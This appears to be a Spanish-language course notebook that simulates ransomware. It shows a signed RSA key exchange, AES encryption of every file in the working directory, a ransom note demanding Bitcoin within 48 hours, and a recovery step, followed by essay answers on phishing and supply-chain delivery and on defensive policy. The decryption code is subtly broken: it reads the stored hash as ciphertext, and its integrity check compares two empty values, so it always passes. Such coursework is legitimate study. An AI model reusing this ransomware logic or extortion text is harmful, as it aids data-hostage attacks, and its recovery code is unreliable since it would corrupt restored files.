In [ ]:
pip install pycryptodome

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.3/2.3 MB 26.7 MB/s eta 0:00:00


In [ ]:
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Random import get_random_bytes
from glob import glob

# Generar claves de largo plazo
print("Generando claves de largo plazo...")
clave_privada_atacante = RSA.generate(2048)
clave_publica_atacante = clave_privada_atacante.publickey()
clave_privada_victima = RSA.generate(2048)
clave_publica_victima = clave_privada_victima.publickey()

# Crear certificados
cert_atacante = {'id': 'atacante', 'pk': clave_publica_atacante}
cert_victima = {'id': 'victima', 'pk': clave_publica_victima}

# Generar claves efímeras (corto plazo)
print("Generando claves efímeras...")
clave_efimera_priv_atacante = RSA.generate(2048)
clave_efimera_pub_atacante = clave_efimera_priv_atacante.publickey()
clave_efimera_priv_victima = RSA.generate(2048)
clave_efimera_pub_victima = clave_efimera_priv_victima.publickey()

# Firmar claves públicas efímeras
print("Firmando claves públicas efímeras...")
# Atacante firma su clave efímera
msg_atacante = clave_efimera_pub_atacante.export_key('DER')
h_atacante = SHA256.new(msg_atacante)
firma_atacante = pkcs1_15.new(clave_privada_atacante).sign(h_atacante)
# Víctima firma su clave efímera
msg_victima = clave_efimera_pub_victima.export_key('DER')
h_victima = SHA256.new(msg_victima)
firma_victima = pkcs1_15.new(clave_privada_victima).sign(h_victima)

# Verificar firmas (simulación de intercambio)
print("Verificando firmas...")
# Víctima verifica la firma del atacante
msg_recibido_atacante = clave_efimera_pub_atacante.export_key('DER')
h_recibido_atacante = SHA256.new(msg_recibido_atacante)
try:
    pkcs1_15.new(cert_atacante['pk']).verify(h_recibido_atacante, firma_atacante)
    print("Víctima: Firma del atacante válida")
except (ValueError, TypeError):
    print("Víctima: Firma del atacante inválida")
    raise
# Atacante verifica la firma de la víctima
msg_recibido_victima = clave_efimera_pub_victima.export_key('DER')
h_recibido_victima = SHA256.new(msg_recibido_victima)
try:
    pkcs1_15.new(cert_victima['pk']).verify(h_recibido_victima, firma_victima)
    print("Atacante: Firma de la víctima válida")
except (ValueError, TypeError):
    print("Atacante: Firma de la víctima inválida")
    raise

# Generar partes del secreto (1024 bits = 128 bytes)
print("Generando partes del secreto...")
S_A = get_random_bytes(128)  # Parte del atacante
S_B = get_random_bytes(128)  # Parte de la víctima

# Cifrar partes del secreto
print("Cifrando partes del secreto...")
# Atacante cifra S_A para la víctima
cipher_atacante = PKCS1_OAEP.new(clave_efimera_pub_victima)
ciphertext_A = cipher_atacante.encrypt(S_A)
# Víctima cifra S_B para el atacante
cipher_victima = PKCS1_OAEP.new(clave_efimera_pub_atacante)
ciphertext_B = cipher_victima.encrypt(S_B)

# Descifrar partes del secreto (simulación de intercambio)
print("Descifrando partes del secreto...")
# Víctima descifra S_A
cipher_victima_dec = PKCS1_OAEP.new(clave_efimera_priv_victima)
S_A_recibido = cipher_victima_dec.decrypt(ciphertext_A)
# Atacante descifra S_B
cipher_atacante_dec = PKCS1_OAEP.new(clave_efimera_priv_atacante)
S_B_recibido = cipher_atacante_dec.decrypt(ciphertext_B)

# Calcular secreto compartido con XOR
print("Calculando secreto compartido...")
S_atacante = bytes(a ^ b for a, b in zip(S_A, S_B_recibido))
S_victima = bytes(a ^ b for a, b in zip(S_A_recibido, S_B))

# Verificar que el secreto sea el mismo
assert S_atacante == S_victima, "Los secretos compartidos no coinciden"
print("Secreto compartido generado exitosamente.")
print("Secreto compartido (en hexadecimal):", S_atacante.hex())

Generando claves de largo plazo...
Generando claves efímeras...
Firmando claves públicas efímeras...
Verificando firmas...
Víctima: Firma del atacante válida
Atacante: Firma de la víctima válida
Generando partes del secreto...
Cifrando partes del secreto...
Descifrando partes del secreto...
Calculando secreto compartido...
Secreto compartido generado exitosamente.
Secreto compartido (en hexadecimal): 986b8110689f8417f7c7f6caf8e9cc8b6f4e14dff0f7beddcf2595b7dc9a8c2c193da02040c861bac5a366a6236ecac10c5747381d6d1e22b568d30d4767fc29b8494687410268f704120808207a76a3fd1b521387037e8c580cc78fd015e65affdd46a982776764aa63b9550ab66dd6c76d007dee3ac9b75a219dd37a23d7de


In [ ]:
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes
import os

hash_original = None

# Función para derivar la llave simétrica usando SHA-256
def derivar_llave(secreto_comun):
    """Deriva una llave simétrica de 256 bits a partir del secreto común usando SHA-256."""
    return SHA256.new(secreto_comun).digest()

# Función para cifrar un archivo usando AES-256-CBC
def cifrar_archivo(ruta_archivo, llave):
    """Cifra el archivo especificado usando AES-256-CBC y guarda el resultado en un nuevo archivo."""
    with open(ruta_archivo, 'rb') as f:
        datos = f.read()

    hash_original = SHA256.new(datos).digest()

    # Generar un IV aleatorio
    iv = get_random_bytes(16)

    # Crear el cifrador AES en modo CBC
    cipher = AES.new(llave, AES.MODE_CBC, iv)

    # Cifrar los datos (con padding si es necesario)
    ciphertext = cipher.encrypt(pad(datos, AES.block_size))

    # Guardar el IV y el ciphertext en un nuevo archivo
    with open(ruta_archivo + '.encrypted', 'wb') as f:
        f.write(iv + hash_original + ciphertext)

# Simulación del secreto común (obtenido de la fase anterior)
# En la práctica, esto sería el resultado del protocolo AKE v.2
secreto_comun = S_victima#bytes.fromhex('00112233445566778899aabbccddeeff')  # Ejemplo de 16 bytes

# Derivar la llave simétrica
llave_aes = derivar_llave(secreto_comun)
print("Llave AES derivada:", llave_aes.hex())

list_files = glob('*.*')
print("Archivos TXT:", list_files)

# Cifrar los archivos de prueba
for file in list_files:
    cifrar_archivo(file, llave_aes)
    print(f"Archivo {file} cifrado y guardado como {file}.encrypted")

Llave AES derivada: e9e186c4ed74817ead52d50754fae30145613c90268102b8e3d553f394c118ab
Archivos TXT: ['text_to_encrypt_2.txt', 'text_to_encrypt.txt']
Archivo text_to_encrypt_2.txt cifrado y guardado como text_to_encrypt_2.txt.encrypted
Archivo text_to_encrypt.txt cifrado y guardado como text_to_encrypt.txt.encrypted


In [ ]:
from IPython.display import HTML, display

def show_notification():
    message = """
    <h1 style='color: red; text-align: center;'>¡ATENCIÓN!</h1>
    <p style='font-size: 16px; text-align: center;'>
        Sus archivos han sido cifrados por un ransomware.<br>
        Para recuperar el acceso a sus archivos, debe realizar un pago de 0.1 BTC a la siguiente dirección:<br>
        <strong>1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa</strong><br>
        Una vez realizado el pago, contacte a <a href='mailto:recuperacion@example.com'>recuperacion@example.com</a> con el comprobante.<br>
        Tiene 48 horas para realizar el pago, de lo contrario, la llave de descifrado será eliminada permanentemente.
    </p>
    """
    display(HTML(message))

# Show the notification in the output
show_notification()

# Save the instructions to a text file
with open('NOTIFICACION.txt', 'w') as f:
    f.write("""
¡ATENCIÓN!
Sus archivos han sido cifrados por un ransomware.
Para recuperar el acceso a sus archivos, debe realizar un pago de 0.1 BTC a la siguiente dirección:
1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Una vez realizado el pago, contacte a recuperacion@example.com con el comprobante.
Tiene 48 horas para realizar el pago, de lo contrario, la llave de descifrado será eliminada permanentemente.
""")

print("Se ha creado un archivo 'NOTIFICACION.txt' con las instrucciones.")

Se ha creado un archivo 'NOTIFICACION.txt' con las instrucciones.


In [ ]:
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import unpad

hash_recuperado = None

# Función para descifrar archivos
def descifrar_archivo(ruta_encrypted, llave):
    """Descifra un archivo cifrado con AES-256-CBC"""
    with open(ruta_encrypted, 'rb') as f:
        iv = f.read(16)  # Los primeros 16 bytes son el IV
        ciphertext = f.read()  # Resto es el texto cifrado

    # Crear cifrador y descifrar
    cipher = AES.new(llave, AES.MODE_CBC, iv)
    datos_plana = unpad(cipher.decrypt(ciphertext), AES.block_size)

    hash_recuperado = SHA256.new(datos_plana).digest()

    # Guardar archivo original (removiendo la extensión .encrypted)
    nombre_original = os.path.splitext(ruta_encrypted)[0]
    with open(nombre_original, 'wb') as f:
        f.write(datos_plana)

# Simulación de recuperación tras pago (usando el mismo secreto)
print("\n=== FASE DE RECUPERACIÓN ===")

# 1. El atacante "envía" las instrucciones (simulado por el código)
print("Instrucciones del atacante:")
print("1. Usar el secreto compartido para derivar la llave")
print("2. Ejecutar el proceso de descifrado")

# 2. La víctima deriva la misma llave (ya tiene el secreto)
llave_recuperacion = derivar_llave(secreto_comun)
print("\nLlave de recuperación:", llave_recuperacion.hex())

list_files_encrypted = glob('*.*.encrypted')
print("Archivos TXT:", list_files)

# 3. Descifrar todos los archivos .encrypted
for file in list_files_encrypted:
    descifrar_archivo(file, llave_recuperacion)
    print(f"Archivo {file} descifrado como {os.path.splitext(file)[0]}")

if hash_recuperado != hash_original:
    raise ValueError("Integridad comprometida")


=== FASE DE RECUPERACIÓN ===
Instrucciones del atacante:
1. Usar el secreto compartido para derivar la llave
2. Ejecutar el proceso de descifrado

Llave de recuperación: e9e186c4ed74817ead52d50754fae30145613c90268102b8e3d553f394c118ab
Archivos TXT: ['text_to_encrypt_2.txt', 'text_to_encrypt.txt']
Archivo text_to_encrypt.txt.encrypted descifrado como text_to_encrypt.txt
Archivo text_to_encrypt_2.txt.encrypted descifrado como text_to_encrypt_2.txt


## Asuman el rol del atacante. Imaginen que realizan una implementación funcional y real de su malware y lo convierten en un arma de ataque ¿Qué estrategias utilizarían para que la víctima lo instale en su máquina? Es decir, ¿Cómo implementarían el paso 1 descrito en la operación?

Como atacante, una estrategia efectiva para lograr que la víctima instale el ransomware consistiría en aprovechar técnicas de ingeniería social cuidadosamente diseñadas. Una de las formas más comunes sería el uso de correos electrónicos de phishing dirigidos, en los que se suplanta la identidad de una fuente confiable, como un proveedor o compañero de trabajo, incluyendo archivos adjuntos aparentemente inofensivos (como documentos de Word o Excel con macros maliciosas) o enlaces que conducen a páginas web falsas pero creíbles que descargan el malware. Otra vía de infección efectiva podría ser la manipulación de sitios web legítimos frecuentados por el objetivo, inyectando código malicioso que aproveche vulnerabilidades del navegador. También sería factible distribuir el ransomware como parte de instaladores de software crackeado o actualizaciones falsas, que las víctimas podrían descargar de foros o sitios de descarga no oficiales. En escenarios más elaborados, se podrían utilizar dispositivos USB infectados dejados deliberadamente en lugares públicos o atacar la cadena de suministro, comprometiendo software legítimo antes de que sea distribuido a los usuarios. Estas técnicas buscan siempre aprovechar el eslabón más débil de la seguridad: el usuario final.

## Asuman el rol del defensor. Describan políticas y prácticas para garantizar la confidencialidad, la integridad y la disponibilidad de recursos informáticos en una organización. En particular, estas políticas y prácticas deberían mitigar la ocurrencia de este tipo de ataques.

Desde la perspectiva del defensor, es fundamental establecer políticas y prácticas robustas que garanticen la confidencialidad, integridad y disponibilidad de los recursos informáticos para prevenir ataques como los de ransomware. Para mantener la confidencialidad, se deben implementar mecanismos de cifrado tanto en datos almacenados como en tránsito, así como aplicar controles de acceso estrictos, asegurando que solo el personal autorizado pueda manejar información crítica. La autenticación multifactor es también una medida clave para evitar accesos no autorizados. En cuanto a la integridad, es esencial contar con sistemas de detección y prevención de intrusiones, así como herramientas antimalware y de monitoreo de comportamiento que permitan identificar y bloquear amenazas en tiempo real. La verificación mediante hashing y el control de versiones contribuyen a garantizar que los archivos no hayan sido alterados de manera maliciosa. Para asegurar la disponibilidad, se deben realizar copias de seguridad de forma periódica y almacenarlas en medios desconectados de la red para prevenir su cifrado por parte del ransomware. Además, un plan de recuperación ante desastres bien definido y probado puede significar la diferencia entre una interrupción temporal y una pérdida significativa de datos y operaciones. Finalmente, la capacitación continua del personal sobre buenas prácticas de ciberseguridad, la aplicación del principio de mínimo privilegio y la actualización constante de sistemas y aplicaciones son elementos cruciales para fortalecer la postura defensiva de cualquier organización frente a este tipo de amenazas.